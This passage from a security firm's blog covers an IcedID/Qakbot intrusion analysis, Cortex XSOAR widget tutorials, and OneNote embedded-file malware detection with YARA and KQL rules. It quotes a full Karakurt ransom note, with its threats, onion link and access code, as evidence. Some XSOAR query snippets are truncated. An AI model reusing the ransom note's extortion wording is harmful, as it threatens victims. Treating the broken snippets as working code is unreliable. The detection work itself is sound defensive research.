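    for line in dump.strip().splitlines():
        account, nt_hash = line.split()
        groups[nt_hash].append(account)
    return dict(groups)
```

Run against the clipboard data above, this would place six accounts, including the domain Administrator, under a single hash.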

Attacker Notes

While the above findings do not aid attribution, one operator did leak their intrusion notes. Within these notes (“[...]” trimmed for readability) we can observe Russian annotations, commonly related to CIS-based crime groups, as well as information on then-ongoing breaches. A couple of days after the network traffic was captured, two non-honeypot companies mentioned within these notes were listed on the Black Basta ransomware group’s leak site.

Hostname CTYMNGR1 =ist  ne v domene
Hostname PCCXCNAU001 (4)-no ad/da/error 
Hostname W10EQZAFI10027 -?ff ne prishla
Hostname NPD104 -24 host (7)
Hostname DESKTOP-3R921OV -small
Hostname CAS-TAB0010 [...] 28m 9prosto) yshla v off/sdelal zakrep MSNDevices? 
Hostname PC-REC-LEFT-10 --???? ? ?? ????
Hostname TRAINING - w 20m (???) razobral
Hostname RM6988 32m (??????) ?????????? ? ???? ?? ?????????? ???????? + ???????? ??????? 
Hostname EXIRP316151 ?????? ?? ????? ???????
Hostname ADMIN201 ???? ? ???
Hostname ODSCHEDULING  [...] 12m work7---yshla v off
Hostname MDC1104 [...] 11m istok razobral

Ransom Notes

Another recovered artifact was a full ransom note where authors identified themselves as belonging to the Karakurt Team. While this note did not allow for the identification of its victim, it is further evidence of IcedID and Qakbot’s role within the access broker ecosystem.

Ok, you are reading this - so it means that we have your attention.
Here's the deal :
1. We breached your internal network and took control over all of your systems.
2. We analyzed and located each piece of more-or-less important files while spending weeks inside.
3. We exfiltrated anything we wanted (the total size of taken data exceeds 372 GB).

- Who the hell are you?
- The Karakurt Team. Pretty skilled hackers I guess.

- Our motivation is purely financial.

- We are going to report this to law enforcement.
- You surely can, but be ready that they will confiscate most of your IT infrastructure, and even if you will later change your mind and decide to pay - they will not let you.

- Who else already knows about the breach?
- Only You, who received the same message the same way. Nobody else. For now.

- What if I tell you that I do not care and going to ignore this incident.
- That's a very bad choice. If you will not contact us in a timely manner (by 07.01.2022) we will start notifying your employees, clients, partners, subcontractors and any other persons that should know how you treat your own corporate secrets and theirs.

- What if I will not contact you even after it?
- Than we shall move forward and start contacting your business competitors and list of anonymous inside traders we deal with, to find out if they are going to pay us for your data. When the list of the people who is interested in such data is formed - the closed online auction starts.

- None will buy what you took! I do not believe you!
- If the auction fails - we will just leak everything online, making sure that this leak goes straight to the press. We will make sure that your business will bleed by using any power we have in our posession, both social and technical.

- What happens if I pay?
- Nothing bad will happen.
We will remove everything we took from your network and leave you be.
We will provide the confirmation that the data is deleted.
We will help you to close technical vulnerabilities you have and provide some insight on how to avoid such incidents if some other perpetrator is interested in you.
We will never tell anybody about it.

- We understand. We are ready to move forward.
- You will find the Access Code at the end of this file, you will need this one to get in contact with us for further instructions

To contact us using this ID you should do the following :
1. Download Tor browser - and install it.
2. Open link in TOR browser - https://omx5iqrdbsoitf3q4xexrqw5r5tfw7vp3vl3li3lfo7saabxazshnead.onion
3. Insert Access Code 70fdca335aa3fd45a182f39b2592a5d0 inside the field on the page and click Enter.
4. The chat window will open and we will be able to communicate through a secured channel.

This link is available via "Tor Browser" only!

As a gesture of goodwill, we are ready to give you another leak - it is exclusive and fresh as well. Just let us know if you are interested in cooperation.

Key Takeaways

While it may not be complex to detect IcedID or Qakbot itself (any modern EDR should detect the rundll32.exe abuse), distinguishing which interactive actions were taken through a VNC backdoor does pose challenges. Focus is often put on command-based executions without considering what could otherwise be considered legitimate user processes, such as web browsers or Outlook. Understanding how these backdoors operate improves response and forensic capabilities by, for example, allowing the identification and explanation of Edge processes with unlikely or unsupported flags.

This blog post further outlined the value of network-level visibility which, for complex or BYOD (Bring Your Own Device) environments, may compensate for the lack of endpoint visibility. In this spirit, we would like to highlight the effectiveness of the Snort IDS rules published by Networkforensic with regards to the detection of IcedID command & control communications.

If you are facing challenges keeping your environment clean or need help due to a compromise, do not hesitate to reach out; NVISO can help!

Maxime Thiebaut

Maxime Thiebaut is a GCFA-certified researcher within NVISO Labs. He spends most of his time performing defensive research and responding to incidents. Previously, Maxime worked on the SANS SEC699 course. Besides his coding capabilities, Maxime enjoys reverse engineering samples observed in the wild.

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – number widgets



Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC is data visualization: analysts can be swarmed with information, and finding out which piece of data is currently both relevant and significant can become hard. One of our tasks as SOAR engineers is to ease the decision process for analysts; we do so by providing additional contextual information about the incidents they handle, directly within the incident layout. To this end, we incorporate number widgets into the analyst interface; these allow us to tell more visual stories about the security incidents we manage in XSOAR. From raw and sometimes unorganized data, they let us create eye-catching depictions of elements that can help in assessing the impact and veracity of a detection.


In this blogpost, we will focus on the use of number widgets.

We will show you how to use them for outputting information to the War Room, incidents, indicators and dashboards. On top of that, we will also cover how to add trend information and even how to integrate them into a dashboard with a dynamic query. In the previous post in the series, we looked at dynamic sections in Cortex XSOAR and how to leverage them to display text in a tree-like way. If you are not familiar with Cortex XSOAR and dynamic sections, please read that post first.

We previously saw that we could use dynamic sections to display text, but a few other options are available to us. In this post, we will:

  • Start with a simple example that runs a static query against Microsoft Sentinel and lets us display a single number widget.
  • Continue with extracting a second number from our query to populate the trend of the number we display.
  • Bring our widget to a dashboard
  • Make our dashboard widget read the date range selected by the user and modify the Sentinel query accordingly.

Let’s begin with a new automation and follow the instructions available in the number widget example of the Palo Alto documentation. When we run their example, we get the following result:

Figure 1: War Room output of the code example available in the Cortext XSOAR documentation

As expected, the example works out of the box. Let’s now go and make the widget display data from Microsoft Sentinel.

A static number from sentinel

To display data pulled from Microsoft Sentinel (Microsoft Azure’s cloud native SIEM), we first need to call an integration command. Here we use an instance of the Azure Log Analytics integration available in the Cortex XSOAR marketplace:

res = demisto.executeCommand(
	"azure-log-analytics-execute-query", {
		"query": THE_QUERY
	}
)
We need a query to run; we will develop it on Sentinel before using it from Cortex XSOAR.

We will be looking at entries in SecurityIncident, a table that holds information about the security incidents present in your Sentinel deployment. We will query that table, and count the number of distinct incidents in a given month. The query we will use for that is the following:

SecurityIncident
| where TimeGenerated between (
| summarize count()
Figure 2: Screenshot of a Microsoft Sentinel query and its results: single value

Now that we know our query works, we will port it to Cortex XSOAR. We start by duplicating our previous automation and adding code to call the integration with the Sentinel query.

res = demisto.executeCommand("azure-log-analytics-execute-query", {
"query": """SecurityIncident
| where TimeGenerated between(
| summarize count()"""
})

We need to extract the count_ we observed in the Sentinel results; let’s inspect the res object returned to us by the integration.

Figure 3: Debug view in PyCharm

Upon inspection of the returned object, we identify that we can use the following logic to extract the count of incidents:

counts = []

for result in results:
    if not (
        isinstance(result, dict)
        and isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if (
            isinstance(content, dict)
            and isinstance(count := content.get("count_"), int)
        ):
            counts.append(count)

total_count = sum(counts)

With the total_count obtained, we can simply change the hardcoded number from our previous widget and replace it with the value we just fetched:

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": total_count,
        "params": {
            "name": "Incidents Last Month",
            "colors": {
                "items": {
                    "green": {
                        "value": 40
                    }
                }
            }
        }
    }
}

demisto.results(data)

In the snippet above we use demisto.results(); this function lets us write to the standard output that will be read by Cortex XSOAR. More possibilities for returning data from an automation are available in this documentation page: Python code conventions, returning data. Here we use type 17 in the data we return; this is the type associated with widgets, and the list of all defined types is available here.

Upon running our new automation, we get the exact same number previously obtained through Sentinel:

Figure 4: War room view of the widget outputted by the “Single value from Sentinel” code snippet

Adding a trend

We already have the number of alerts from last month pulled into XSOAR and displayed as a widget, let’s continue and also pull the count for the previous month. Our query to Sentinel now becomes:

SecurityIncident
| where TimeGenerated between (datetime("2022-10-01T00:00:00+00:00") .. datetime("2022-11-01T00:00:00+00:00"))
| extend same = 1
| union (
    SecurityIncident
    | where TimeGenerated between (datetime("2022-09-01T00:00:00+00:00") .. datetime("2022-10-01T00:00:00+00:00"))
    | extend same = 2)
| summarize count() by same
Figure 5: Screenshot of a Microsoft Sentinel query and its results: two values

Correspondingly, our querying and extracting code becomes:

this_month_counts = list()
last_month_counts = list()

lookup = {
    1: this_month_counts,
    2: last_month_counts
}

for result in results:
    if not (
        isinstance(result, dict)
        and isinstance(contents := result.get("Contents"), list)
    ):
        continue
    for content in contents:
        if not isinstance(content, dict):
            continue
        if not isinstance(raw_same_target := content.get("same"), int):
            continue
        same_target = lookup.get(raw_same_target)
        if (
            same_target is not None
            and isinstance(count := content.get("count_"), int)
        ):
            same_target.append(count)

total_this_month_counts = sum(this_month_counts)
total_last_month_counts = sum(last_month_counts)
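To sanity-check this demultiplexing logic outside of Cortex XSOAR, it can be exercised against a handcrafted result object shaped like the integration output (the sample values below are made up):

```python
# Fake response shaped like the azure-log-analytics-execute-query output
fake_results = [{
    "Contents": [
        {"same": 1, "count_": 40},  # current timeframe bucket
        {"same": 2, "count_": 25},  # previous timeframe bucket
    ]
}]

this_month_counts, last_month_counts = [], []
lookup = {1: this_month_counts, 2: last_month_counts}

for result in fake_results:
    for content in result.get("Contents", []):
        # route each row to the right list based on its "same" marker
        target = lookup.get(content.get("same"))
        if target is not None and isinstance(content.get("count_"), int):
            target.append(content["count_"])

print(sum(this_month_counts), sum(last_month_counts))  # 40 25
```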

As for the data returned to Cortex XSOAR, the only change is on the stats key which now becomes:

"stats": {
	"prevSum": total_last_month_counts,
	"currSum": total_this_month_counts
}

The resulting widget looks as follows:

Figure 6: War room view of the widget outputted by the “Dual values from Sentinel” code snippet

Moving to incidents and indicators

Until now, we have been displaying our widgets in the war room; however, we can also add them to incident and indicator layouts. As a reminder, the procedure to add General Purpose Dynamic sections to an incident can be found here: Add a Script to the incident Layout.

Our existing widgets are already compatible with incidents and indicators. After following the instructions above on how to add widgets to incidents, we can get the following layout tab. In a similar fashion, after adding the dynamic-indicator-section tag to all three automations, you can also add them as widgets to an indicator layout:

Figure 7: Incident VS Indicator view of the three widgets

Moving to a dashboard

Rendering widgets in a dashboard is actually easier than in an incident layout. To verify this, let's compare the methods to output a simple number widget, both for an incident and for a dashboard. For an incident, as we already saw earlier, you need to return the actual number, but it needs to be wrapped appropriately:

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": 53,
        "params": {
            "layout": "horizontal",
            "name": "Lala",
            "sign": "@",
            "colors": {
                "items": {
                    "#00CD33": {
                        "value": 10
                    },
                    "#FAC100": {
                        "value": 20
                    },
                    "green": {
                        "value": 40
                    }
                }
            },
            "type": "above"
        }
    }
}

demisto.results(data)

In contrast, it is much easier for a dashboard:

result = 10

The difference here is that when building a dashboard, you can access the widget builder:

Figure 8: Dashboard widget editor view

Whereas from an incident, you need to explicitly return metadata defining the look and feel of your widget.

Therefore, if we want to make it possible for our automations to be used from a dashboard too, we need to adapt them to return either a simple value if being called from a dashboard, or a wrapped value if called from an incident or indicator.

Our first addition to the existing scripts will be to identify whether we're being called from a dashboard; we will use the following snippet for this purpose.

is_dashboard = demisto.args().get("widgetType") is not None

This works because dashboards that have automation based widgets add a special argument when calling these automations. This special argument mentions the expected result type and can be found under the key widgetType; its presence is a good indication that your automation has been called from a dashboard.

We can now differentiate our outputted results depending on whether or not we are in a dashboard. For that, we separate our incident/indicator results in two, between the actual data and the wrapper. This snippet exposes the statement above applied to our first automation:

number = 53

data = {
    "Type": 17,
    "ContentsFormat": "number",
    "Contents": {
        "stats": number,
        # params metadata identical to the first automation, omitted here
    }
}

if is_dashboard:
    demisto.results(number)
else:
    demisto.results(data)

We do this with our three automations and also add the widget tag to them to make them selectable as source for automation-based dashboard widgets. Once added to a dashboard, our widgets look as follows:

Figure 9: Dashboard view of the three widgets

Getting timeframe data from the dashboard

At this point we are powering our widgets with data from Sentinel, but we are always looking at data from the same timeframe. Because dashboards have a time picker, we can instead start to use that data to determine the timeframe we are querying Sentinel for. Extraction of timeframe data from dashboards was covered in this previous blogpost.

We start by adding this line to our automation:

FromDate, ToDate = (

This gives us two NitroDates we can use to craft our Sentinel queries. In our second script which queries a single timeframe, the code becomes:

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f'TimeGenerated >= datetime("{from_}")')

if to_ is not None:
    tmp_query_list.append(f'TimeGenerated < datetime("{to_}")')

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| summarize count() by same"""
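The optional-bounds logic above can be factored into a small helper and tested in isolation. A sketch (build_query is my name for it, not part of the original automation):

```python
def build_query(from_=None, to_=None):
    """Build the Kusto query, adding only the time bounds the dashboard supplied."""
    query = "SecurityIncident"
    clauses = []
    if from_ is not None:
        clauses.append(f'TimeGenerated >= datetime("{from_}")')
    if to_ is not None:
        clauses.append(f'TimeGenerated < datetime("{to_}")')
    if clauses:
        # only emit a where clause when at least one bound exists
        query += "\n| where " + " and ".join(clauses)
    return query + "\n| extend same = 1\n| summarize count() by same"

print(build_query(to_="2022-11-01T00:00:00+00:00"))
```

With no bounds at all ("all time" in the date picker), the where clause disappears entirely instead of producing an invalid filter.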

The logic we are modifying is the one describing how we craft our Kusto query (the query language used in Microsoft Sentinel). We previously always had at our disposal a from_ and a to_ string representing the beginning and end of the timeframe we were interested in. With the dashboard date range selector, this is not the case anymore: we may get only a start date if the selector is on “3 days ago to now”, or only an end date if the selector is on “up to 3 days ago”. We must then change the logic we use to craft our query in a way that reflects this change. To accommodate this, we replace the between statement with >= and < statements used to compare the TimeGenerated of an incident to the dates transmitted by the dashboard.

In a similar fashion, we modify the 3rd automation to calculate both the initial timeframe, and the previous timeframe from the dates passed down by the dashboard.

from_ = "2022-10-01T00:00:00+00:00"
to_ = "2022-11-01T00:00:00+00:00"

from_2 = "2022-09-01T00:00:00+00:00"
to_2 = "2022-10-01T00:00:00+00:00"

if is_dashboard:
    if isinstance(FromDate, NitroRegularDate):
        # Derive the preceding timeframe of equal length; the NitroDate
        # accessor names below are reconstructed and may differ from the
        # original script
        if isinstance(ToDate, NitroRegularDate):
            td = ToDate.to_datetime()
        else:
            td = datetime.now(timezone.utc)
        delta = td - FromDate.to_datetime()
        from2 = NitroRegularDate(date=FromDate.to_datetime() - delta)
        to2 = FromDate
    else:
        from2 = FromDate
        to2 = ToDate

    if isinstance(FromDate, NitroRegularDate):
        from_ = FromDate.to_iso8601()
    else:
        from_ = None
    if isinstance(ToDate, NitroRegularDate):
        to_ = ToDate.to_iso8601()
    else:
        to_ = None
    if isinstance(from2, NitroRegularDate):
        from_2 = from2.to_iso8601()
    else:
        from_2 = None
    if isinstance(to2, NitroRegularDate):
        to_2 = to2.to_iso8601()
    else:
        to_2 = None

query = "SecurityIncident"

tmp_query_list = list()

if from_ is not None:
    tmp_query_list.append(f"TimeGenerated >= datetime(\"{from_}\")")

if to_ is not None:
    tmp_query_list.append(f"TimeGenerated < datetime(\"{to_}\")")

if tmp_query_list:
    query += "\n| where " + " and ".join(tmp_query_list)

query += """
| extend same = 1
| union (
    SecurityIncident"""

tmp_query_list2 = list()

if from_2 is not None:
    tmp_query_list2.append(f"TimeGenerated >= datetime(\"{from_2}\")")

if to_2 is not None:
    tmp_query_list2.append(f"TimeGenerated < datetime(\"{to_2}\")")

if tmp_query_list2:
    query += "\n| where " + " and ".join(tmp_query_list2)

query += """
| extend same = 2)
| summarize count() by same"""
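The previous-timeframe arithmetic can be illustrated with plain datetime objects (the NitroDate wrappers are left out for clarity):

```python
from datetime import datetime, timezone

# Dashboard timeframe [frm, to): "this month" in the hardcoded defaults
frm = datetime(2022, 10, 1, tzinfo=timezone.utc)
to = datetime(2022, 11, 1, tzinfo=timezone.utc)

# Preceding timeframe of equal length: [frm - (to - frm), frm)
delta = to - frm
frm2 = frm - delta
to2 = frm

print(frm2.isoformat())  # 2022-08-31T00:00:00+00:00
```

Note that a sliding window of equal length is not the same as the previous calendar month: the computed 2022-08-31 differs from the 2022-09-01 used in the hardcoded fallback values, because October is one day longer than September.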

Our dashboard is now fully dynamic, with two widgets presenting data corresponding to the selected timeframe:

Figure 10: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Today”
Figure 11: Dashboard view of the three widgets, data in third widget corresponds to the selected timeframe: “Last 7 days”

Looking back

We have covered the use of number widgets throughout Cortex XSOAR in pretty much every scenario, and have managed to make use of all the inputs available to us. Although the process used in this post was centered around number widgets, it should be noted that it can be applied to all other types of widgets.


Cortex XSOAR documentation: script based widget examples

Cortex XSOAR documentation: script based widget example 2

Microsoft Azure: Sentinel

Cortex XSOAR marketplace: Azure Log Analytics Integration

Cortex XSOAR documentation: Python code conventions

GitHub: Cortex XSOAR source – EntryTypes

Cortex XSOAR documentation: adding a script to an incident layout

About the author

Benjamin Danjoux

Benjamin is a senior engineer in NVISO’s SOAR engineering team.
As the SOAR engineering design lead, he is responsible for the overall architecture and organization of the automated workflows running on Palo Alto Cortex XSOAR, which enables the NVISO SOC analysts to detect attackers in customer environments.

OneNote Embedded file abuse

OneNote in the media

In recent weeks OneNote has gotten a lot of media attention as threat actors are abusing the embedded files feature in OneNote in their phishing campaigns.
I first observed this OneNote abuse in the media via Didier’s post. It was later also mentioned in Xavier’s ISC diary and on the podcast. In early February, The Hacker News covered it as well.

Attack technique

The OneNote feature abused in these phishing campaigns is the ability to hide embedded files behind pictures that entice the user to click. If the picture is clicked, the file hidden beneath it is executed. These files can be executables, JavaScript files, HTML files, PowerShell scripts, and so on: essentially any file type capable of executing malware. Recently we have also observed the use of .chm files with an embedded index.html that runs inline JavaScript.
On a Windows system this roughly translates to either one of the following processes executing the script/file: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'.

An image of a malicious embedded OneNote file
An image of a malicious embedded OneNote file

Anatomy of a OneNote file

Didier did amazing work in his blogpost where he described what a OneNote file looks like. What is interesting to us is that OneNote files use GUIDs to indicate the start of the embedded file section. The GUID that represents the start of an embedded file in OneNote is {BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}. Using the following tool, we can convert the GUID to a HEX string: e716e3bd65261145a4c48d4d0b7a9eac.
With a HEX editor, you can search for this string and find the exact location of the embedded file.
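The GUID-to-hex conversion can also be reproduced in a few lines of Python; the bytes come out in the GUID's little-endian (mixed-endian) storage layout, which is exactly the sequence to search for in a hex editor:

```python
import uuid

# GUID marking the start of an embedded file section in a .one file
guid = uuid.UUID("{BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC}")

# .one files store GUIDs with the first three fields little-endian,
# which bytes_le reproduces
hex_marker = guid.bytes_le.hex()
print(hex_marker)  # e716e3bd65261145a4c48d4d0b7a9eac
```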
OneNote then reserves 20 bytes: the first 8 bytes indicate the length of the file, the following 4 bytes are unused and have to be zero, and the last 8 bytes are reserved and also zero. This results in the following HEX string appearing before the embedded file data begins: E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00.
When taking a look at a OneNote file through a HEX editor, it quickly becomes clear that OneNote does not attempt to encrypt or compress anything. That is, if you are looking at a .one file, not a .onepkg. A .onepkg file acts similarly to a ZIP file containing the exported files from a OneNote Notebook; it is possible to open these files using 7zip.
The OneNote file (.one) displays the contents of the embedded file as follows:

A OneNote file in a HEX editor, that shows a plaintext embedded file

This means that we can easily check for known false positives while analyzing these files, which brings me to the next point, creating a detection rule.


It would not be easy to create a detection rule that catches all malicious embedded files, as scripts usually do not have a “magic byte”, unlike executables with their famous “MZ” header. While it would be easy to create a YARA rule that looks for the previously observed hex string plus the MZ file header, this would only flag embedded executables. If that is your goal, it is a great rule; however, I would like something more flexible that I can use on an email gateway to flag all potentially malicious incoming OneNote files.
So I took a different approach. I observed that it is common for pictures (e.g.: screenshots) to be embedded in a OneNote file. I did not observe many cases that had other files embedded. This led me to create a YARA rule that would look at a OneNote file, ignore the file sections that indicate that an image is present but would raise an alert when any other file was observed. So instead of looking for Malicious files, I will ignore known legitimate files. This simple trick allowed me to create a high confident detection rule while not overloading analysts with too many false positives.
Of course every environment is different and if it is common for PDF files to be embedded in OneNote files in your environment, you should exclude those PDF files as well. Therefore, it is important to establish a baseline during a testing period.
Below is an example of this technique. The 00‘s after the ?? can be replaced with ?? as well. Although these bytes should always be empty, this rule will not detect the files if the bytes were altered.

rule OneNote_EmbeddedFiles_NoPictures
{
    meta:
        author = "Nicholas Dhaeyer - @DhaeyerWolf"
        date_created = "2023-02-14 - <3"
        date_last_modified = "2023-02-17"
        description = "OneNote files that contain embedded files that are not pictures."
        reference = ""

    strings:
        $EmbeddedFileGUID =  { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC }
        $PNG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 89 50 4E 47 0D 0A 1A 0A }
        $JPG = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF D8 FF }
        $JPG20001 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0C 6A 50 20 20 0D 0A 87 0A }
        $JPG20002 = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 FF 4F FF 51 }
        $BMP = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 42 4D }
        $GIF = { E7 16 E3 BD 65 26 11 45 A4 C4 8D 4D 0B 7A 9E AC ?? ?? ?? ?? ?? ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 47 49 46 }

    condition:
        $EmbeddedFileGUID and (#EmbeddedFileGUID > #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF)
}

The latest version of this rule can be found on my GitHub

The logic behind the rule is as follows: the YARA rule matches any file containing the GUID that marks an embedded file in a OneNote file. It then counts the number of GUIDs found. If this count is higher than the number of GUIDs directly followed by an image file (specified here as #PNG + #JPG + #JPG20001 + #JPG20002 + #BMP + #GIF), other files are present and the rule matches. If not, the file only contains images and is assumed to be safe.
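For clarity, the same counting logic can be expressed in Python as a simplified model of the YARA condition (only the PNG and JPEG magics are included here):

```python
MARKER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")

# Image magics that may legitimately follow the 20-byte header
# (the YARA rule additionally covers JPEG2000, BMP and GIF)
IMAGE_MAGICS = (
    bytes.fromhex("89504e470d0a1a0a"),  # PNG
    bytes.fromhex("ffd8ff"),            # JPEG
)

def has_non_image_embeds(data: bytes) -> bool:
    """Model of the condition: more embed markers than image-prefixed markers."""
    total = images = 0
    pos = data.find(MARKER)
    while pos != -1:
        total += 1
        payload = data[pos + len(MARKER) + 20:]  # skip GUID + 20-byte header
        if payload.startswith(IMAGE_MAGICS):
            images += 1
        pos = data.find(MARKER, pos + 1)
    # mirrors: $EmbeddedFileGUID and (#EmbeddedFileGUID > #PNG + #JPG + ...)
    return total > images
```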
After a file is flagged, an analyst should still take a look at the embedded files. DissectMalware created an amazing python script that helps with the extraction of the embedded files. An analyst or automation system can analyze the file and provide more context if the extracted files are malicious or not.

At the time of writing this blogpost, I ran my YARA rule on VirusTotal to see if there were any detections. Looking back only 3 weeks, I found more than 4000 files that matched the rule. One of them, d2e6629f8bbca3663e1d76a06042bc1d459d81572936242c44ccc6cd896bfd5c, had no detections on VirusTotal at the time of writing. When this file is executed, Microsoft detects it as a Qakbot dropper.

MDE blocking a malicious OneNote file infected with Qakbot

One observation that we have made is that a lot of these malicious OneNote files have an embedded file that is inserted from the Z:\builder\ directory. I suspect that this is where the malware builder tool creates the actual malicious file before inserting it into the OneNote file. If this is the case, then this can be used to identify and link these files to the tool that is used.

I built a quick POC to parse these files, which can be found on my GitHub. Additionally, I created a YARA rule on my GitHub that will look for OneNote files that contain these suspicious folder paths.
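The core of such a parser can be sketched in a few lines based on the 20-byte header layout described earlier (an illustration only, not the actual POC; a real parser should walk the FileDataStoreObject structures of the MS-ONESTORE format):

```python
import struct

MARKER = bytes.fromhex("e716e3bd65261145a4c48d4d0b7a9eac")

def extract_embedded_files(data: bytes) -> list:
    """Carve embedded file payloads out of a raw .one file."""
    files = []
    pos = data.find(MARKER)
    while pos != -1:
        # the first 8 bytes after the GUID hold the embedded file's
        # length as a little-endian unsigned 64-bit integer
        (length,) = struct.unpack_from("<Q", data, pos + len(MARKER))
        start = pos + len(MARKER) + 20  # GUID + 20-byte header
        files.append(data[start:start + length])
        pos = data.find(MARKER, start)
    return files
```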

Execution of a script through OneNote

As I was curious what would happen when a script is executed from OneNote, I created a Proof of Concept (POC): a small .bat script that executes the whoami command.

Microsoft MDE Process execution of the embedded file

As can be observed above, OneNote, as the parent process, executes cmd.exe /c {OneNoteFilePath}, where a temporary copy of the script is stored and then executed.
When looking at File creation events, we also observe that this file is created on disk:

FileCreate event for the path: c:\Users\Hera\AppData\Local\Temp\OneNote\16.0\Exported\{CCA4A94E-126B-489B-8B23-2B2C160D42AC}\NT\0\whoami.bat

As a detection rule, it could prove fruitful to detect OneNote spawning any of the lolbins commonly used for script execution, such as the ones previously mentioned: 'powershell.exe', 'pwsh.exe', 'wscript.exe', 'cscript.exe', 'mshta.exe', 'cmd.exe', 'hh.exe'. Additionally, looking for file creation or execution events under the path C:\Users\<username>\AppData\Local\Temp\OneNote\16.0\Exported may give interesting results.

DeviceProcessEvents
| where ProcessCommandLine matches regex @".*C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"

DeviceFileEvents
| where FolderPath matches regex @"C:\\Users\\.*\\AppData\\Local\\Temp\\OneNote\\.*\\Exported\\.*"

Observations in production environments

At some point I was confused: I saw all these articles in the media about this new way of delivering malware, yet to this point I had not seen a single infection or flagged email arrive in our SOC. So I did some digging, and it turns out that Microsoft is pretty good at preventing this new way of malware delivery.
So let’s show some statistics:
Over a period of 30 days with one client we observed 255 emails that contain a OneNote file:

255 observed emails of the FileType: “one;onenote”

48 of these 255 were not flagged by Microsoft as malicious; the remaining 207 were, meaning that more than 80% of the OneNote attachments were already known to be malicious.

Microsoft detecting malicious emails with the filetype: “one;onenote”

When we actually look at the impact, we can see that of the 207 malicious emails, only one was delivered.

Evidence of one malicious email being delivered

This leads me to conclude that, at this moment, Microsoft is very good at blocking these emails. My hypothesis is that, because OneNote embeds files in plain text, without obfuscation and defense evasion by the threat actor they are very easy to catch with traditional ways of scanning files. Once this changes, we might see more impacted cases being reported.


As threat actors look for new ways to deliver their malware, we need to stay one step ahead to protect our data and users. And while Microsoft has already proven able to detect and block these phishing emails, we need to take into consideration that not everyone runs a Microsoft product and that at some point threat actors will find a way to hide their malware better, so that it is not as easily detected.
This blog post was meant to take you step by step through the process of creating a YARA detection rule that can help you prevent being compromised by one of these samples. When creating a detection rule like this, you will have to start from a baseline where you know which embedded files are commonly used within your environment. Although this YARA rule can be used in ‘block’ mode, where it blocks every email that matches, it is recommended to use it in ‘alert’ mode, where an alert is created for the SOC team and the email is held until analysis of the attachment is done, as this will minimize the impact of possible legitimate files being blocked.
Additionally, my goal with this blog post is to show that you don’t always have to think about flagging files as malicious. You can also do it the other way around: flag files as legitimate, ignore those, and focus your attention on the files that have not been flagged. This does, however, require a certain security maturity and takes more time to go through the flagged files.

About the Author

Nicholas Dhaeyer

Nicholas Dhaeyer is a Threat Hunter for NVISO. Nicholas specializes in Malware analysis, Industrial Control System (ICS) / Operational Technology (OT) Security. Nicholas has worked in the NVISO SOC solving security incidents for our MDR clients. You can reach out to Nicholas via Twitter or LinkedIn

Cortex XSOAR Tips & Tricks – Leveraging dynamic sections – text



Cortex XSOAR is a security oriented automation platform, and one of the areas where it stands out is customization.

A recurring problem in a SOC (Security Operation Center) is data availability. As a SOC analyst, doing a thorough analysis of a security incident requires having access to many pieces of information in order to acquire context on the events you are investigating. In a less mature SOC, this information is at best scattered across many tools, and at worst hardly available. This can be overcome by using multiple data sources to ingest contextual information into your Security Orchestration, Automation and Response (SOAR) platform. In turn, this allows you to provide a single pane of glass to the analysts, who can then focus on meaningful work and eliminate data collection from their daily tasks.


In this blogpost, we will focus on the use of dynamic sections to customize layouts in Cortex XSOAR. We will show that they can be used to display raw incident data for debugging purposes without cluttering the main workplace of our analysts.

A dynamic section is a layout element which you can add to a layout tab for either an incident or an indicator.
The fundamental difference between it and most other available layout elements is that it is not bound to displaying incident fields or fields of indicators related to the current incident on display, but instead is purely automation based.
This means that upon being rendered, a dynamic section executes an automation, and it is both the specific format and output of that automation that dictates the style and content that will be rendered.

This is not unlike the behavior of field display scripts, but these will be covered in a later post.

Real World Example

As part of our operations as an MSSP (Managed Security Services Provider), we are often faced with alert ingestion issues or mishaps.

One way these occur is that an alert is fetched into Cortex XSOAR but some of its important features are not picked up by our extraction logic. This could materialize as missing fields in indicators, or missing indicators altogether. We may, for example, receive an alert for suspicious actions taken by a user, yet that very user is not added to the incident as an indicator, nor are details about these actions.

